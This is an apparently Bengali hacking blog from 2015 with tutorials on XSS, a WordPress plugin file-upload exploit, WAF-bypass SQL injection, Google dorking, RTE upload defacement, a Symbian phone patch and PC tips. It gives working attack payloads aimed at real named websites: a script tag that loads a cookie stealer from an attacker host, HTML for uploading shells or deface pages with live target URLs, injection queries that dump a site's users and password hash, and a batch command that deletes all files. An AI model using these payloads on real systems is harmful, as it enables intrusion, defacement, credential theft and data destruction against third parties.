Saturday, February 14, 2015

XSS Hacking Tutorial (Bangla)

                XSS হ্যাকিং টিউটোরিয়াল
                                                                               --- Th3 Ry5u1
XSS কি ?
XSS হ্যাকিং সম্পর্কে জানতে হলে প্রথমেই জানতে হবে XSS জিনিসটা কি? Cross site Scripting এর সংক্ষিপ্তরূপই হচ্ছে XSS এটাকে আবার CSS(Cascading Style sheet) ও বলে থাকে। যার যেভাবে ইচ্ছা সে ভাবে বলে। এটা Web Application Vulnerability এর সবচেয়ে জনপ্রিয় গুলোর একটি। এই vulnerability একজন হ্যাকারকে একটি সাইটে client side scripts (বিশেষ কিছু Javascript) ইনসার্ট করার অনুমতি প্রদান করেন । এই vulnerabilityদিয়ে একজন হ্যাকার ভিকটিমের সাইটে malicious codes, malware attack, phishing ইত্যাদি inject করাতে পারে।
XSS Vulnerability and Injection
·ধাপ ১: Vulnerable ওয়েব সাইট খুঁজে বের করা
একজন হ্যাকার প্রথমে Vulnerable সাইট খুজে বের করেন। এজন্য সে প্রথমে Google এ যায় । তারপর সে Google Dorks ব্যবহার করে Vulnerable সাইট খুজে বের করে । তাহলে আপনি তার সাথে সার্চ দিন নিচের Google Dorks দিয়ে ।

"search?q="

তাহলে আপনি অনেকগুলো Vulnerable সাইট খুজে পাবেন। এবার একটি সাইটে প্রবেশ করুন

·ধাপ ২: Vulnerability পরীক্ষা করা

এখন আমরা যে সাইটে প্রবেশ করেছি, সেই সাইটের Vulnerability পরীক্ষা করে দেখব। এজন্য আপনাকে প্রথমে উক্ত সাইটের এবটি পোষ্ট বা parameter খুঁজে বের করতে হবে। বুঝেছেন? না বুঝলে একটু অপেক্ষা করেন, বলছি। মানে আপনি এমন একটি পোষ্ট খুঁজে বের করবেন যা উক্ত সাইটের সার্ভার পাঠাবে। যেমনঃ search query, username, password.

Vulnerability পরীক্ষা করা জন্য দুটি পদ্ধতি আছে।

পদ্ধতি ১: প্রথম পদ্ধতি হল সাইটের মূল সার্চ বক্সে injection করা।
একজন হ্যাকার সাধারণত সাইটের মূল সার্চ বক্সে একটি malcious script লিখে, তারপর সার্চ বাটনে ক্লিক করে। সার্চ দেয়ার সাথে সাথে malcious script টি ওয়েবসাইটে কাজ করা শুরু করে দেয়।

পদ্ধতি ২: সাইটের URL এ injection  করা ।
এটি কোন সার্চ বক্সে কাজ করে না । এটি শুধু মাত্র সাইটের URL এ কাজ করে থাকে । যেমনঃ-
http://vulnerablewebsite/search?q=malicious_script_goes_here
পরীক্ষা করার সুবিধার্থে  input fields হিসেবে নিচের কোডটি দিন।
<script>alert('hi');</script>
এবার উপরের কোডটি দিয়ে আপনি এবার পরীক্ষা করে দেখুন। যেমনঃ-
প্রথম পদ্ধতিঃ আপনি উপরের কোডটি আপনার ভিকটিমের সাইটের মূল সার্চ বক্সে লিখে সার্চ দেন।
দ্বিতীয় পদ্ধতিঃ আপনি ভিকটিমের সাইটের লিংকে লাগিয়ে এন্টার দিন। যেমনঃ-

http://vulnerablewebsite/search?q=<script>alert('Hi');</script>
এবার যদি ‘HI’ লিখা একটি পপ আপ বক্স আসে। তাহলে বুঝবেন যে এই সাইটটি XSS এর জন্য vulnerable.
·ধাপ ৩: Malicious Scripts দেয়া
Vulnerability পরীক্ষা করার পর একজন হ্যাকারের পরবর্তী কাজ হল, ভিকটিমের সাইটে malicious scripts ইঞ্জেকট করানো। এটি উক্তি সাইটের cookies চুরি করা এবং malware attack করতে সহযোগিতা করবে।
এখন মনে করুন হ্যাকারের সাইটে cookie stealing script টি আছে। তাহলে তার malicious script url হবে

http://attackerSite/malicious.js

·এখন হ্যাকার তার malcious script টি vulnerable site এ inject  করতে পারবেন । তাহলে তার URL হবে
<script src=http://attackerSite/malicious.js></script>

এরপর যখনই উক্ত সাইটের ভিজিটর উক্ত সাইটে ভিজিট করবে, তখনি malcious script টি কাজ শুরু করে দিবে এবং কুকি চুরি করা শুরু করে দিবে।

সাধারণত XSS এর ক্ষমতা অনুসারে persisting capability হয় দুই ধরনের। একটা হল Persistent আরেকটা হল Non-Persistent
Persistent XSS:

এটা হল সবচেয়ে বেশি ঝুঁকিপূর্ণ XSS vulnerability. এটা সরাসরি সার্ভার থেকেই ডাটা সমূহ সংরক্ষণ করে থাকে। তাই আপনি যখনই উক্ত সাইটে malicious script injection দিবেন, সাথে সাথে এটি ওয়েব এ্যাপ্লিকেশানে স্থায়ীভাবে সংরক্ষণ হয়ে যাবে। এটি অন্যন্যা সকল ভিজিটরকে এটা দেখিয়ে দিবে।  যদি আপনি আপনার ভিকটিমের ওয়েব সাইটে malicious script injection করবেন, তাহলে এটি উক্ত সাইটে আসা ভিজিটরদেরও আক্রান্ত করে। যেমনঃ-  কিছু কিছু সাইট আছে, যারা তাদের সাইটের ব্যবহারকারিদের ট্যাক করার জন্য search query গুলো সংরক্ষণ করে রাখে। যার ফলাফল XSS এর permanent storage. icon smile XSS এর সম্পূর্ণ টিউটোরিয়াল (নতুনদের জন্য) পর্ব ৫
Non-Persistent XSS:

একে অনেকেই Reflected XSS বলে থাকে। এজন্যই malicious script এখানে টেম্পরারী। ফলে আপনার দেয়া স্ক্রীপ্টটি সাধারণ ভিজিটররা দেখতে পারবে না। তবে হ্যাঁ, যারা হ্যাকার তারা তাদের দেয়া স্ক্রীপ্টটি ভিজিটরদের দেখানোর জন্য injection টিপস ব্যবহার করে থাকে। মজার বিষয় হল, যারা উক্ত সাইটের যারা নিয়মিত ভিজিটর তারা কিন্তু মনে করে যে এটা সাইটের নিজের লিংক। ফলে তারা সেখানে যায় আর তারও উক্ত সাইটের হ্যাকিংয়ের শিকার হয়। যেমনঃ-  আপনি কিছু কিছু সাইটে যে কোন জিনিস সার্চ দিলে দেখবেন আপনাদের আপনার দেয়া সার্চ স্ট্রিংটি আপনাকে পুনরায় দেখাচ্ছে। এটার কারণেই malicious code temporarily .
একজন হ্যাকার এই Vulnerability দিয়ে কি করে ?

    পরিচয়পত্র ও বিভিন্ন গোপনীয় তথ্য চুরি করা।
    ওয়েব সাই্টের Bypassing restriction
    Session Hijacking
    Malware Attack
    Website Defacement
    Dos attacks

আশা করি সবাই XSS এর বিষয়ে মোটামুটি ভাবে বুঝতে পেরেছেন। আরও কিছু টিউটোরিয়াল সামনে পাবেন। তখন আরও পরিষ্কার ভাবে শিখতে পারবেন XSS এর সম্পর্কে।

Hack With exploit (easiest)

Hacking with Exploit
                                                                             ---Th3 Ry5u1
Google dork: inurl:wp-content/plugins/awesome-support
# Exploit
<html>
<body>
<form action="http://[target]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php" method="post"
enctype="multipart/form-data">
Filename:<input type="file" name="qqfile" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
এই এক্সপ্লইট কোডটা দিয়ে আপনি একটি example.html page তৈরি করবেন । তারপর আপনার পেইজ টা অপেন্দ করে আপনার ডিফেস পেইজ অথবা যেকোনো সেল upload করতে পারবেন ।
# এখানে খেয়াল করবেন এক্সপ্লইট এর ভিতরে [target] আচে এটা আপনি ডর্ক দিয়ে পাওয়া যেকন সাইট দিয়ে পরিবর্তন করে নিবেন ।
Deface/Shell path: http://[target]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/uploads/

Demo sites
http://buzness.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php
http://themespixel.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php
http://www.comproporvos.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php

SQL injection Firewall bypass (bangla)

এস্কিউয়াল ইঞ্জেকশন ফায়ারওয়াল বাইপাস
                                                                     --Th3 Ry5ul
সাধারনত অনেক এস্কিউয়াল ভুলনারেবল সাইট এ order by statement দিয়ে ভুলনারেবল কলাম নাম্বার পেলেও union select,union all select এসব কমান্ড দিয়ে স্ট্রিং কলাম বের করা সম্ভব হয়না :( কি আর করার! তখন আমরা WAF(Web Application Firewall) bypass করি :D

·ফায়ারওয়াল বাইপাস এর সাধারন কিউরি গুলো হল =>
১। http://www.site.com/index.php?id=-1 /*!union*/ /*!select*/ 1,2,3,4,version(),6,7,8,9--

২। http://www.site.com/index.php?id=-1 UNIunionON SELselectECT 1,2,3,4,version(),6,7,8,9--

৩। http://www.site.com/index.php?id=-1 un*ion sel*ect 1,2,3,4,version(),6,7,8,9--

আরও থাকতে পারে :P আমার জানা নাই :P
তবে জিঙ্ক কোড দিয়ে ফায়ারওয়াল বাইপাস করা কার্যকরী জিঙ্ক কোড তেমন কিছু না । ভয় পাবেন না :P
50000 হল জিঙ্ক কোড :D
·অনেক সাইটে union select statement দিয়ে লেখা আসে =>

Not Acceptable ! An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

·আবার অনেক সময় এটা আসেঃ
Forbidden
You don't have permission to access /content.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

[এক্সঃ http://www.wdesignstudio.in/article.php?id=-10'+UNION+SELECT+1,2,3--+ ]
·এটা বাইপাস করতে আমরা জিঙ্ক কোড ব্যাবহার করব :D জিঙ্ক কোড =>
http://www.site.com/index.php?id=-1+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9--

[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,2,3--+ ]

২ নাম্বার স্ট্রিং কলাম পেয়েছি :D (এক্সাঃ অনুযায়ী)
·ভারশন বের করতে শুধু ১৭ এর বদলে version() অথবা @@version লিখলে ই হবে ;)
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,@@version,3--+ ]

দেখুন ভারশন হলঃ 5.5.33-31.1 (এক্সাঃ অনুযায়ী)

·এভাবে টেবিল বের করতে group_concat(table_name) এর জায়গায় unhex(hex(/*!50000concat*/(table_name))) বদলে দিতে হবে আর শেষে   from information_schema.tables where table_schema=database()-- এর জায়গাতে /*!50000from*/+information_schema./**/+tables+where+table_schema=database()-- হবে

[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(table_name))),3+/*!50000from*/+information_schema./**/+tables+where+table_schema=database()--+ ]

[নোটঃ অনেক সময় এটা না হলে unhex(hex(/*!50000concat*/(table_name))) এর জায়গায় /*!50000concat*/(table_name) বসিয়ে দেখতে পারেন তাও না হলে unhex(hex(/*12345concat*/(table_name))) এটা দেখেন -_- আর জদি তাও না হয় >_< সাইট রে গুল্লি মারেন (আমি পারিনা :P)]

·BANNERS টেবিল পেয়েছি ! কিন্তু ফায়ারওয়াল বাইপাস এর সমস্যা ১টাই টেবিল আর কলাম সবগুলা ১সাথে আশে নাহ :( আলাদা করে বের করতে হয় এজন্য শেষে limit 1,1 তারপর limit 2,1 একইভাবে limit 3,1 এভাবে বসিয়ে টেবিল / কলাম আলাদা ভাবে বের করতে হয় ! আমরা এখন শেষে limit 1,1  বসাব!
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(table_name))),3+/*!50000from*/+information_schema./**/+tables+where+table_schema=database()+limit+1,1--+ ]

·আমরা  esh_pages টেবিল পেয়েছি :D এভাবে লিমিত বারাতে থাকেন দেখেন limit 7,1 এ users table :v :v
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(table_name))),3+/*!50000from*/+information_schema./**/+tables+where+table_schema=database()+limit+7,1--+ ]

·এখন users এর হেক্স অথবা char দিয়া কলাম বের করব! কলাম বের করতে table_name এর জায়গায় column_name ; tables+where এর জাগায় columns+where আর table_schema এর জায়গায় table_name    :P
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(column_name))),3+/*!50000from*/+information_schema./**/+columns+where+table_name=0x7573657273--+ ]

·ID আসছে এবার limit 1,1 দিয়া দেখেন !! টেবিল জেভাবে বের করছিলেন অইরকম!
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(column_name))),3+/*!50000from*/+information_schema./**/+columns+where+table_name=0x7573657273+limit+1,1--+ ]

· limit 1,1 দিয়া NAME কলাম পাইসেন :D এবার limit 2,1 দিয়া দেখি :D
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(column_name))),3+/*!50000from*/+information_schema./**/+columns+where+table_name=0x7573657273+limit+2,1--+ ]

·PASSWORD কলাম পাইছি :D এবার আমরা column থেকে data বের করব! এজন্য শেষে

/*!50000from*/+users হবে [নোটঃ কারন টেবিল এর নাম users] এবং (column_name)এর জায়গায় (name,0x3a,password) হবে :D :D দেখি তো :P
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(name,0x3a,password))),3+/*!50000from*/+users--+ ]
·পারসি :D :D (ইয়)
admin: admin

password: 5f4dcc3b5aa765d61d8327deb882cf99

Friday, February 13, 2015

How to use Google Dork

How To Use Google Dork

· প্রথমে Google.Com এ যান ।
· এবার নিচের গুগল ডকটি লিখে সার্চ দিন ।

                           inurl:php?id=

·তাহলে অনেকগুলো ফলাফল দেখাবে ।
· দেখুন ফলাফল দেখাচ্ছে “প্রায় 2,010,000,000টি ফলাফল(0.23 সেকেন্ড) ”
· এবার যে কোন একটি সাইটে প্রবেশ করুন ।
· এছাড়াও আপনি যে কোন সাইট ধরতে পারবেন, যে সব সাইটের পর php?id= আছে । সেই সব সাইটে পারবেন । 
·যেমনঃ

http://www.paulprescott.com/theme.php?id=10

· আমরা এই সাইটটিকে টার্গেট করলাম ।
· এবার আপনার টার্গেট করা সাইটের লিংকের শেষে দেখেন এমন একটা আছে ID=XX, এখানে XX এর জায়গায় যেকোন নং আছে। যেমন আমার এখানে আছে ID=10
· এবারর এই লিংকের শেষে একটা ( ‘ ) লাগান । (keyboard er Esc button er nicher ta .. apostrophe na kintu..)
    এবার এন্টার দিন ।
· এবার যদি উপরের মতো Error দেখায়, তাহলে বুঝবেন যে, সাইটটিতে inject করা যাবে ।

Wednesday, February 11, 2015

10 Important Tips For PC

1- View full specifications of your PC:
Just go to Run
type "dxdiag"
press enter.
... Then you can view all PC specifications.

2- Delete all files of a Hard Disc when run a
simple file:
>Notepad >Type DEL/F/Q*>Save it as delete
command

3- Boost Ur PC
>Right click My Computer>Proprties
>Advancd>Performnce >Advancd>Virtual
Memory >Change
Keep Initial Size
Same & Max Size Double

4- Increase your Web Browser loading
speed & save Time by 65%(both pc & mobi)
:
1) CLEAR CACHE MEMORY at every 10 min.
2) Set OFF IMAGES if no need!

5- Make ur own font in XP:
Private charecter editor used for editing
fonts.
- run
- Type "eudcedit"
- Try making new fonts.

6- Trick 2 increase PC life:
-Shut down proprly
-Dont place many icons in desktop
-Keep 50% free spce in C drive
-Dont keep foldrs in task bar.

7- Who used ur PC in ur Absence?
What did he do?
1st u shud Go-
>start
>run
>Type- eventvwr.msc

8- U can explore the whole world online
now like google earth without any softwre.
Go
www.wikimapia.org
&
see your home, roof & garden on your pc.

9- Want to Block Unwanted Website on
firefox:
Download this addon:
https://addons.mozilla.o/rg/en-US/ firefox/
addon/ 4351
after it
block any site.

10- How to add password to files & folders
on computer?
>Right click >new>Compressedfolder >paste
file in to folder >Right click add password

RTE HACKING TUTORIAL

               RTE হ্যাকিং টিউটোরিয়াল

--- Th3 Ry5u1

প্রথমে Google.com এ যান ।
এবার নিচের যে কোন একটি ডক
দিয়ে সার্চ দিন ।
inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/
inurl:RTE_popup_file_atch.asp
তাহলে গুগল
আপনাকে অনেকগুলো ফলাফল
দিবে । যে ফলাফলগুলো দেখাবে,
সেগুলো দেখতে এমন হবে
site.com/rte/RTE_popup_file_atch.asp
site.com/admin/RTE_popup_file_atch.asp
এখন ধরুন আমরা এই
ওয়েবসাইটটি পেয়েছি ।
http://www.billkonigsberg.com
তাহলে এর Vulnerability হবে
http://www.billkonigsberg.com/RTE_popup_
file_atch.asp
এবার সাইটটিতে প্রবেশ করুন ।
একটি পেইজ আসবে যাতে দেখবেন
upload দেওয়ার option আছে ।
এবার Browes বাটনে ক্লিক
করে আপনার html defacepage
আপলোড করুন । এবার Upload
বাটনে ক্লিক করুন ।
আপনার আপলোড শেষ
হলে বামপাশে আপনার আপলোড
করা ফাইলগুলো দেখাবে । আপনার
আপলোড করার পর আপনার
পেজটি হবে (এখানে FC5_index.htm
এটা হল আমার আপলোড করা ফাইল) ।
http://www.billkonigsberg.com/my_
documents/my_files/Th3_Ry5u1.htm
শুধু HTML নয় আপনি asp বা jpg shell
আপলোড করতে পারবেন ।
http://www.billkonigsberg.com/my_
documents/my_files/আপনার_ডিফেস_
পেইজের_নাম.htm এটাই হবে আপনার
হ্যাক করা site এর লিঙ্ক ।
আপনি মিরর এ এই লিঙ্কটা সাবমিট
দিবেন ।

Tuesday, February 10, 2015

Hack your symbian phone to run apps from unknown source

হ্যাক করুন আপনার সিম্বিয়ান ফোন আর সব সফটওয়্যার চালান নির্বিগ্নে

 

 আমরা সিমবিয়ান ফোনে অনেক সফটওয়্যার ইনষ্টল করতে গেলে একটি সমস্যার সম্মুখীন হই। তা হল " Error Certificate "
আজ আমি সেই সমস্যার সমাধান সম্পর্কে বলব। তা হলে শুরু করা যাক-

Xplore full

Step.1.- নিচের জিপ ফাইলটা ডাউনলোড করে xplore দিয়ে explore করেন C ফোল্ডারে TMQUARANTINE.zip

Step. 2- এবার নিচের mobile antivirus টা ডাউনলোড করে ইনষ্টল দেন ।

Mobile Antivirus.sis

এবার আপনার ফোন restart চাইবে । restart দেন।

Step. 3- Mobile Antivirus ওপেন করেন

অপশনে গিয়ে quarantine list এ সব মার্ক করে restore করুন

000.jpg

Step . 4- নিচ থেকে rompatcher ডাউনলোড করে ইনষ্টল করূন
এবার করে Patch apply করে add to auto সিলেক্ট করুন

Rompatcher.sisx
0000.jpg

আপনার মোবাইল যদি C5 , E5 হয় তাহলে ফোনটি HACK হয়েছে

অন্য ফোন ইউজাররা step 5 ফলো করুন
Step. 5- xplore এ গিয়ে configuaration > show all ram এবং rom এ মার্ক করেন

00000.jpg

নিচের ফাইল দুইটা ডাউনলোড করে extract করুন c > sys > bin>here
Installserver 9.1 N73

Installserver 9.2
000000.jpg

আর কি ! এবার আপনার মোবাইল সম্পূর্ন *HACKED*